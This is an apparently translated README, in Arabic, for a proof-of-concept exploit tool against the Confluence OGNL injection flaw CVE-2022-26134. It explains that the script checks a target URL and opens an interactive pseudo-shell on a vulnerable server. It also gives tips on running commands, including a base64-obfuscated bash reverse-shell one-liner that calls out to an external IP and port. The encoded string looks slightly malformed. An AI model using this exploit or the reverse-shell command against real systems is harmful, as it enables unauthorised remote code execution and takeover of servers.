## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SNCKER-CVE-2022-26134
# CVE-2022-26134
حقن تعبير OGNL في Confluence يؤدي إلى RCE(CVE-2022-26134) برهان المفهوم والاستغلال
## تحديث
إضافة تجاوز الصندوق الرملي (sandbox bypass)، ودعم الإصدارات العالية.
# الاستخدام
root@kitploit:~
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
سيتحقق السكريبت تلقائياً من وجود الثغرة في الهدف، وسيدخل إلى شبه شيل تفاعلي إذا كان الهدف ضعيفاً.
اختبار تحت لينكس:

اختبار تحت ويندوز:

فقط أدخل 'q' عند الرغبة في الخروج.
# بعض النصائح
يتم تمرير معاملات الأوامر مباشرة إلى دالة runtime.exec، التي لا تملك سياق الشيل.
لذا.
تحت ويندوز، لا يمكن تنفيذ بعض الأوامر مثل `dir` مباشرة، يمكنك استخدام `cmd.exe /c dir`.
تحت لينكس، لا يمكن لبعض الرموز الخاصة أن تعمل. إذا كنت بحاجة لتنفيذ أمر يحتوي على رموز خاصة مثل reverse shell، يمكنك ترميزه بـ base64 ثم استخدام `bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}`.